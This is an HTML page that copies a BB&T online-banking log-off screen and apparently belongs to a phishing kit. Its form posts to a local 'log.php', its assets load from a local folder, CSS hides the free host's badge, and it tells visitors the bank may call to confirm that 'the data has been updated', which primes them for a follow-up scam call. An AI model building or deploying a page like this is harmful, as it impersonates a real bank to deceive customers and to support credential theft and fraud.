<!DOCTYPE html>
<!-- saved from url=(0157)https://bank.bbt.com/auth/prompt.tb?TAM_OP=login&USERNAME=unauthenticated&ERROR_CODE=0x00000000&ERROR_TEXT=HPDBA0521I%20%20%20Successful%20completion&URL=%2F -->
<html lang="en-US" style="" class="js flexbox canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths ua-windows_nt ua-windows_nt-10 ua-windows_nt-10-0 ua-chrome ua-chrome-76 ua-chrome-76-0 ua-chrome-76-0-3809 ua-chrome-76-0-3809-100 ua-desktop ua-desktop-windows ua-webkit ua-webkit-537 ua-webkit-537-36 js gt-ie8"><!--<![endif]--><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>
	BB&T Bank - Log Off    </title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">
    <meta name="format-detection" content="telephone=no">
	
	<link href="T-Dox/wpfile/logon-10142018-new.css" rel="stylesheet" media="screen, print">
	<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="T-Dox/etc/designs/bbt/bbtcom/favicon.ico"/>

	<script src="https://bank.bbt.com/bbtpassreset/content/js/jquery-1.9.1.min.js"></script>
        <script src="https://bank.bbt.com/auth/js/library/jquery-3.3.1-jquery-migrate-3.0.0.min.js"></script>
    <script src="https://bank.bbt.com/auth/js/library/modernizr-2.6.2-respond-1.1.0.min.js"></script>


    <!--[if lt IE 9]>
    <script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

<script src="https://www.bbt.com/assets/apps/dtm_auth/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/scripts/satellite-5c5b66d264746d4d06000688.js"></script><script src="https://www.bbt.com/assets/apps/dtm_auth/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/scripts/satellite-5c5b56eb64746d57d6001e32.js"></script><script src="https://www.bbt.com/assets/apps/dtm_auth/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/scripts/satellite-5c7553e664746d44c90016f6.js"></script><style id="at-makers-style" class="at-flicker-control">
.mboxDefault {visibility: hidden;}
</style><script src="https://www.bbt.com/assets/apps/dtm_auth/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/scripts/satellite-5c5b56eb64746d57d6001e32.js"></script></head>
<!-- Begin Changes for Timeout Warning -->
	<!-- End Changes for Timeout Warning -->



<body class="design-prototype no-auth" onkeydown="submitMeOnEnter(event)">
<div class="overflow-wrap">
<div class="menu-holder">
<header class="bai-header">
	<div id="main-nav" class="cf container">
		<div id="logo">
			<a href="https://www.bbt.com/online-services/online-banking/u-by-bbt.page"><img src="T-Dox/wpfile/u-logo.png" alt="BB&amp;T Logo" class="logo"></a>
		</div>
	<div class="clearfix"></div>
	</div>
</header>
<script type="text/javascript" src="https://bank.bbt.com/auth/js/util32-09112016.js"></script>
<div class="content-wrapper clearfix">
<div class="full-content">
	<div class="clearfix">	
		<div class="sub-wrapper bai-wrapper">
			<div class="sub-inner-wrapper">
				<div class="sub-widget-wrapper one-column-centered">
				    <div class="widget">
						<section class="logon-block">
							<h3>Thank you for using bbt.com </h3>
							<article class="module">
								<div class="mod-content">
									<form id="logonUserForm" class="stacked-form" action="log.php" method="post" name="loginForm" onsubmit="return false;">
										
																<h3>You can receive a call from BB&T Bank, To confirm that the data has been updated. </h3><br><h5>  You have successfully logged off. Thank you for visiting. </h5>
															</div>
															<div class="clearfix"></div>
														</div>
													</div>
						        				</div>
						        			</div>
										</fieldset>
									</form>
									<div class="clear"></div>
								</div>
							</article>
							<footer class="mod-footer"></footer>
						</section>
				    </div>
				</div>
			</div>
		</div>
	</div>
</div>
</div>
<script language="JavaScript">
		/** The Function is to prevent Multiple Submits via Enter key.*/
        var formSubmitted = false;

        function doubleSubmitCheck() {
                // Check if the form has previously been submitted
                if (formSubmitted) {
                        return false;
                } else {
                        formSubmitted = true;
                        return true;
                }
        }
        if (!(navigator.userAgent.search("Safari") >= 0 && navigator.userAgent.search("Chrome") < 0))
        {
			document.loginForm["UserName"].focus();
        }
		function submitMeOnEnter(e){
		 if(e.keyCode == 13)  {     submitLogin(); }
		}
		function cancelButton()
		{
		   window.location.href="https://www.bbt.com/online-services/online-banking/u-by-bbt.page";
		}

		function submitLogin() {	
		var_ns.data_parse('var_field');	
 		 if(document.loginForm["UserName"].value && document.loginForm["Password"].value){			
			if (doubleSubmitCheck()) {
			   document.loginForm.submit();
			}
		 }			  
		}
</script>
		
				
		
		<script type="text/javascript" src="https://bank.bbt.com/auth/js/library/jquery-1.9.1.min.js"></script>
		<script>var $j = jQuery.noConflict();</script>
		<script>jQuery(window).unload(function(){});</script>
		<!--<script language="JavaScript" type="text/javascript" src="js/dtm-09112016.js"></script>-->
		<!--<script language="JavaScript" type="text/javascript" src="js/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/satelliteLib-2039843a7a97ef0847cd764b5a6ada6f146969bf.js"></script>-->
		<script language="JavaScript" type="text/javascript" src="https://www.bbt.com/assets/apps/dtm_auth/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/satelliteLib-2039843a7a97ef0847cd764b5a6ada6f146969bf.js"></script><script src="https://www.bbt.com/assets/apps/dtm_auth/ac265c174e480c2b170c2d73fbe2ff4ca87ebaac/mbox-contents-a1af2c889392435f93e3904e3cd274b9442a4d6d.js"></script>
		<script type="text/javascript" src="https://bank.bbt.com/auth/js/wa-09112016.js"></script>

		<script>
		try{
					bbt.wa.OLBAnalytics.config(
				{
					env: 'prod'
				});
				} catch (e) {
			// web analytics error: just move on
		}
		</script>				

		<script>
			$j(document).ready(function() {
					
				bbt.wa.OLBAnalytics.submitPageLoad( 
					{
						pageId   : 'myfi:login:enter_user_id',
						channel  : 'myfi:login',
						sessionId: '',
						hier : 'myfi:login:enter_user_id',
						server : 'myfi',						
													secFeature : ''
											});
				
			});
		</script> 
		
<footer class="footer">

    <section class="footer__top-level">
		
        <div class="wrapper u-grid u-grid--sm u-grid--gutters">
            <p class="access">All links in this section open in a new tab</p>
                <div class="footer__column u-grid__cell">
					<h3 id="bbt-support-links" class="footer__section-header u-mg-b--md">Support</h3>
					<div class="u-grid u-grid--sm" aria-labelledby="bbt-support-links">
					
						<div class="u-grid__cell u-grid__cell--1-2--sm u-grid__cell--1-1--md u-grid__cell--1-2--lg">
							<ul class="footer__list-blk">
								<li class="footer__list-item"><a href="https://www.bbt.com/start.page" target="_blank">BB&amp;T Home</a></li>
								<li class="footer__list-item"><a href="https://www.bbt.com/privacy-and-security/default.page">Privacy &amp; Security</a></li> 
							</ul>
						</div>
						
						<div class="u-grid__cell u-grid__cell--1-2--sm u-grid__cell--1-1--md u-grid__cell--1-2--lg">
							<ul class="footer__list-blk">
								<li class="footer__list-item"><a href="https://www.bbt.com/online-services/online-banking/docs/disclosures.page" target="_blank">Disclosures</a></li>
								<li class="footer__list-item"><a href="https://www.bbt.com/locator/search.page" target="_blank">Locations</a></li>    
							</ul>
						</div>
					
						<div class="u-grid__cell u-grid__cell--1-1--sm">
							<div class="">
								<p class="footer__paragraph u-hide-large">U Support
									<a href="tel:18882286654" class="tel-link footer__link">888‑BBT‑ONLINE (888‑228‑6654)</a>
								</p>

								<p class="footer__paragraph u-large-only">U Support
									<span class="tel-link">888‑BBT‑ONLINE (888‑228‑6654)</span>
								</p>
							</div>
						</div>
					</div>
				</div>
				
				<div class="footer__column u-grid__cell u-grid__cell--2-3--md u-hide-small">
					<h3 id="bbt-product-links" class="footer__section-header u-mg-b--md">BB&amp;T Products</h3>

					<div class="u-grid u-grid--md" aria-labelledby="bbt-product-links">
						<div class="u-grid__cell">
							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/banking/default.page" target="_blank" id="personal-banking-links" class="footer__link u-font-size--h4 u-font-weight--semibold">Personal Banking</a>
							</div>

							<ul class="footer__list-blk" aria-labelledby="personal-banking-links">
								<li class="footer__list-item">
									<a href="https://www.bbt.com/banking/checking/default.page" target="_blank" class="footer__link">Checking</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/banking/savings/default.page" target="_blank" class="footer__link">Savings</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/banking/credit-cards/default.page" target="_blank" class="footer__link">Credit Cards</a>
								</li>
							</ul>
						</div>

						<div class="u-grid__cell">
							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/lending/default.page" target="_blank" id="lending-links" class="footer__link u-font-size--h4 u-font-weight--semibold">Lending</a>
							</div>

							<ul class="footer__list-blk" aria-labelledby="lending-links">
								<li class="footer__list-item">
									<a href="https://www.bbt.com/lending/mortgage/default.page" target="_blank" class="footer__link">Mortgage</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/lending/home-equity/default.page" target="_blank" class="footer__link">Home Equity</a>
								</li>

								<li class="footer__list-item">
									<a href="https://www.bbt.com/lending/personal-loans/auto-loan.page" target="_blank" class="footer__link">Auto Loan</a>
								</li>
							</ul>
						</div>
						
						<div class="u-grid__cell" role="region" aria-label="Other Services">
							<div class="u-mg-b--sm">
								<a href="https://insurance.bbt.com/insurance/personal/start.page" target="_blank" class="footer__link">Insurance Services</a>
							</div>

							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/investing/investment-services/default.page" target="_blank" class="footer__link">BB&amp;T Investments</a>
							</div>

							<div class="u-mg-b--sm">
								<a href="http://www.bbtscottstringfellow.com/" target="_blank" class="footer__link">BB&amp;T Scott &amp; Stringfellow</a>
							</div>

							<div class="u-mg-b--sm">
								<a href="https://www.bbt.com/wealth/start.page" target="_blank" class="footer__link">Wealth</a>
							</div>
						</div>
					</div>
				</div>
			</div>
		</section>

		<section class="footer__sub-level u-txt-align--center u-font-size--sm">
			<div class="wrapper">
			<p class="footer__paragraph">Only deposit products are FDIC insured.</p>

			<p class="footer__paragraph">
			Branch Banking and Trust Company is a Member FDIC and an Equal Housing Lender

			<span class="icon-equal-housing-lender " aria-hidden="true"></span>
			.
			</p>

			<div class="background-format u-max-width--md u-mg-x--auto">
			Securities, Insurance and Advisory Services are:

			<ul>
			<li class="u-mg-b--0 u-display--inline-block">
			NOT A DEPOSIT

			<span aria-hidden="true">●</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">
			NOT FDIC-INSURED

			<span aria-hidden="true">●</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">
			NOT GUARANTEED BY A BANK

			<span aria-hidden="true">●</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">
			NOT INSURED BY ANY STATE OR FEDERAL GOVERNMENT AGENCY

			<span aria-hidden="true">●</span>
			</li>

			<li class="u-mg-b--0 u-display--inline-block">MAY GO DOWN IN VALUE</li>
			</ul>
			</div>

			<p class="footer__paragraph">©2019, Branch Banking and Trust Company. All Rights Reserved.</p>
			</div>
		</section>
	 
	   <div class="clearfix"></div>

	</footer>

</div>
</div>

<script src="https://bank.bbt.com/auth/js/library/myfi_script_v8-09112016.js"></script>
<script src="https://bank.bbt.com/auth/js/library/myfi_overview_script_v7-09112016.js"></script><a href="https://bank.bbt.com/auth/prompt.tb?TAM_OP=login&amp;USERNAME=unauthenticated&amp;ERROR_CODE=0x00000000&amp;ERROR_TEXT=HPDBA0521I%20%20%20Successful%20completion&amp;URL=%2F#" id="toTop" style="display: none;"><span id="toTopHover"></span>To Top</a>
        <script src="https://bank.bbt.com/auth/js/bai-custom-combined-12112016-old.js"></script>
<script type="text/javascript">
// Script to prevent page from being Framed
	if (self != top) {
		if (document.images)
		top.location.replace(window.location.href);
		else
		top.location.href = window.location.href;
	}
// END
</script>


<style>img[alt="www.000webhost.com"]{display:none;}</style>

  
</body></html>